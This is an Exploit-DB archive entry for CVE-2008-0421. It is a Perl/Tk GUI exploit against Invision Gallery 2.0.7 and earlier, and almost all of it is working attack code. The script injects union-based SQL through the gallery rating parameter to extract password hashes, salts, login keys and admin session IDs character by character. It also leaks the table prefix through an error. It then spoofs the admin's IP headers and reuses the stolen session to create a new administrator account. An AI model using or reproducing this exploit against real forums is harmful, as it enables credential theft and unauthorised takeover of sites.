Invision Gallery <= 2.0.7 - Remote SQL Injection Exploit

2008-01-22T00:00:00
ID EDB-ID:4966
Type exploitdb
Reporter RST/GHC
Modified 2008-01-22T00:00:00

Description

Invision Gallery <= 2.0.7 Remote SQL Injection Exploit. CVE-2008-0421. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

## Invision Gallery version &lt;= 2.0.7 sql injection exploit
## (c)oded by 1dt.w0lf
## RST/GHC

##        THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE
##                   KEEP IT PRIVATE

use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;

$mw = new MainWindow(title =&gt; "r57ig207" );

$mw-&gt;geometry ( '420x510' ) ;
$mw-&gt;resizable(0,0);

$mw-&gt;Label(-text =&gt; '!', -font =&gt; '{Webdings} 22')-&gt;pack();
$mw-&gt;Label(-text =&gt; 'Invision Gallery &lt;=2.0.7 sql injection exploit by RST/GHC', -font =&gt; '{Verdana} 7 bold',-foreground=&gt;'red')-&gt;pack();
$mw-&gt;Label(-text =&gt; '')-&gt;pack();

$fleft=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
$fright=$mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

$url = 'http://server/forum/index.php';
$user_id = '1';
$prefix = 'ibf_';
$table = 'members';
$column = 'member_login_key';
$new_admin_name = 'rstghc';
$new_admin_password = 'rstghc';
$new_admin_email = 'billy@microsoft.com';
$report = '';
$group = 1;
$curr_user = 0;
$use_custom_fields = 0;
$custom_fields = 'name1=value1,name2=value2';

$fleft-&gt;Label ( -text =&gt; 'Path to forum index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'Database tables prefix: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$prefix) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fleft-&gt;Label ( -text =&gt; 'get data from database', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fleft-&gt;Label ( -text =&gt; 'Get data from table: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$b2 = $fright-&gt;BrowseEntry( -command =&gt; \&update_columns, -relief =&gt; "groove", -variable =&gt; \$table, -font =&gt; '{Verdana} 8');
$b2-&gt;insert("end", "members");
$b2-&gt;insert("end", "members_converge");
$b2-&gt;insert("end", "admin_sessions");
$b2-&gt;insert("end", "validating");
$b2-&gt;pack( -side =&gt; "top" , -anchor =&gt; 'w');

$fleft-&gt;Label ( -text =&gt; 'Get data from column: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$b = $fright-&gt;BrowseEntry( -relief =&gt; "groove", -variable =&gt; \$column, -font =&gt; '{Verdana} 8');
$b-&gt;insert("end", "member_login_key");
$b-&gt;insert("end", "name");
$b-&gt;insert("end", "ip_address");
$b-&gt;insert("end", "legacy_password");
$b-&gt;insert("end", "email");
$b-&gt;pack( -side =&gt; "top" , -anchor =&gt; 'w' );

$fleft-&gt;Label ( -text =&gt; 'Returned data: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$report) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'create new admin', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fleft-&gt;Label ( -text =&gt; 'session_id: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$session_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'session_ip_address: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$session_ip_address) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'new admin name: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_name) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'new admin password: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_password) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; 'new_admin_email: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$new_admin_email) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fleft-&gt;Label ( -text =&gt; ' ')-&gt;pack();
$fright-&gt;Checkbutton( -font =&gt; '{Verdana} 8', -text =&gt; 'Use custom profile fields', -variable =&gt; \$use_custom_fields)-&gt;pack(-side =&gt; "top" , -anchor =&gt; 'w');

$fleft-&gt;Label ( -text =&gt; 'custom fields: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$custom_fields) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Test forum vulnerability',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&test_vuln
               )-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Get database tables prefix',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&get_prefix
               )-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Get data from database',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&get_data
               )-&gt;pack();

$fright-&gt;Button(-text    =&gt; 'Create new admin',
                -relief =&gt; "groove",
                -width =&gt; '30',
                -font =&gt; '{Verdana} 8 bold',
                -activeforeground =&gt; 'red',
                -command =&gt; \&create_admin
               )-&gt;pack();



$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();
$fleft-&gt;Label( -text =&gt; '+++ PRIV8 +++', -font =&gt; '{Verdana} 7')-&gt;pack();
$fleft-&gt;Label( -text =&gt; '(c)oded by 1dt.w0lf', -font =&gt; '{Verdana} 7')-&gt;pack();
$fleft-&gt;Label( -text =&gt; 'RST/GHC', -font =&gt; '{Verdana} 7')-&gt;pack();

MainLoop();

sub update_columns()
 {
 $b-&gt;delete(0,"end");
 if($table eq 'members'){
 $column = "member_login_key";  
 $b-&gt;insert("end", "member_login_key");
 $b-&gt;insert("end", "name");
 $b-&gt;insert("end", "ip_address");
 $b-&gt;insert("end", "legacy_password");
 $b-&gt;insert("end", "email");
 } elsif($table eq 'members_converge'){
 $column = "converge_pass_hash";  
 $b-&gt;insert("end", "converge_pass_hash");
 $b-&gt;insert("end", "converge_pass_salt");
 $b-&gt;insert("end", "converge_email");
 } elsif($table eq 'admin_sessions'){
 $column = "session_id";  
 $b-&gt;insert("end", "session_id");
 $b-&gt;insert("end", "session_ip_address");
 $b-&gt;insert("end", "session_member_name");
 $b-&gt;insert("end", "session_member_id");
 } elsif($table eq 'validating'){
 $column = "vid";  
 $b-&gt;insert("end", "vid");
 }
 }

sub get_data()
{
$xpl = LWP::UserAgent-&gt;new( ) or die;
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get data from database', -buttons =&gt; ["OK"]);
if($table eq 'members') { $id_text = 'id'; }
if($table eq 'members_converge') { $id_text = 'converge_id'; }
if($table eq 'admin_sessions') { $id_text = 'session_member_id'; }
if($table eq 'validating') { $id_text = 'member_id'; }
$i = 1;
$report = '';
while(1)
 {
 $ret = get_char($i);
 if($ret == 0) { last; }
 else { $report .= chr($ret); $i++; $mw-&gt;update(); }
 }
 if($report eq '') {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get data', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
 } else {
 if($column eq 'session_id') { $session_id = $report; $mw-&gt;update(); }
 elsif($column eq 'session_ip_address') { $session_ip_address = $report; $mw-&gt;update(); }
 $InfoWindow-&gt;add('Label', -text =&gt; 'Done!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack;
 }  
 $InfoWindow-&gt;Show();
 $InfoWindow-&gt;destroy;
}

sub get_char()
 {
 $res = $xpl-&gt;get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,ascii(substring(".$column.",".$_[0].",1)),1,1,1,1,1,1,1,1 FROM $prefix$table WHERE $id_text = $user_id");
 if($res-&gt;as_string =~ /cmd=user&user=(\d*)&op=view_album/) { $rep = $1; }
 else { $rep = 0; }
 return $rep;
 }
 
sub create_admin()
 {
 $InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'create new admin', -buttons =&gt; ["OK"]);
 if($session_id eq '' || $session_ip_address eq '')
  {
  $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
  $InfoWindow-&gt;add('Label', -text =&gt; 'You need insert admin session_id and session_ip_address', -font =&gt; '{Verdana} 8')-&gt;pack;
  }
 elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
  {
  $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
  $InfoWindow-&gt;add('Label', -text =&gt; 'session_ip_address wrong!', -font =&gt; '{Verdana} 8')-&gt;pack;
  }
 else
  {
 $xpl = LWP::UserAgent-&gt;new( ) or die;
 ($url2 = $url) =~ s/index.php/admin.php/;
 $cf = '';
 %fields = (
 'code'     =&gt; 'doadd',
 'act'      =&gt; 'mem',
 'section'  =&gt; 'content',
 'name'     =&gt; $new_admin_name,
 'password' =&gt; $new_admin_password,
 'email'    =&gt; $new_admin_email,
 'mgroup'   =&gt; 4, ## default admin group , maybe need change    
           );
 if($use_custom_fields)
  {
  @cf = split(',',$custom_fields);
  foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
  }
 
 $res = $xpl-&gt;post($url2."?adsess=$session_id",
 [
 %fields,
 ],
 'USER_AGENT'=&gt;'',
 'CLIENT_IP'=&gt;"$session_ip_address",
 'X_FORWARDED_FOR'=&gt;"$session_ip_address");
 $InfoWindow-&gt;add('Label', -text =&gt; 'Done!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack;
 $InfoWindow-&gt;add('Label', -text =&gt; 'New admin created', -font =&gt; '{Verdana} 8 bold')-&gt;pack; 
  }
 $InfoWindow-&gt;Show();
 $InfoWindow-&gt;destroy;
 }

sub test_vuln()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'test forum vulnerability', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$xpl = LWP::UserAgent-&gt;new( ) or die;
$res = $xpl-&gt;get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,11457,1,1,1,1,1,1,1,1/*");
if($res-&gt;is_success)
 {
 $rep = '';
 if($res-&gt;as_string =~ /cmd=user&user=(\d*)&op=view_album/) { $rep = $1; }
 if($rep == 11457) { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM VULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; }
 else { $InfoWindow-&gt;add('Label', -text =&gt; 'FORUM UNVULNERABLE', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'green')-&gt;pack; }
 }
else
 {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
 $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack;
 }
$InfoWindow-&gt;Show();
$InfoWindow-&gt;destroy;
}

 
sub get_prefix()
{
$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get database tables prefix', -buttons =&gt; ["OK"]);
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
$xpl = LWP::UserAgent-&gt;new( ) or die;
$res = $xpl-&gt;get($url."?automodule=gallery&cmd=rate&img=1&rating=1&album=-1\\");
if($res-&gt;is_success)
 {
 $rep = '';
 if($res-&gt;as_string =~ /FROM (.*)gallery_albums/)
 {
 $prefix = $1;
 $InfoWindow-&gt;add('Label', -text =&gt; 'Prefix: '.$prefix, -font =&gt; '{Verdana} 8 bold')-&gt;pack;
 }
 else
 {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Can\'t get prefix', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack; }
 }
else
 {
 $InfoWindow-&gt;add('Label', -text =&gt; 'Error!', -font =&gt; '{Verdana} 8 bold',-foreground=&gt;'red')-&gt;pack;
 $InfoWindow-&gt;add('Label', -text =&gt; $res-&gt;status_line, -font =&gt; '{Verdana} 8')-&gt;pack;
 }
$InfoWindow-&gt;Show();
$InfoWindow-&gt;destroy;  
}

# milw0rm.com [2008-01-22]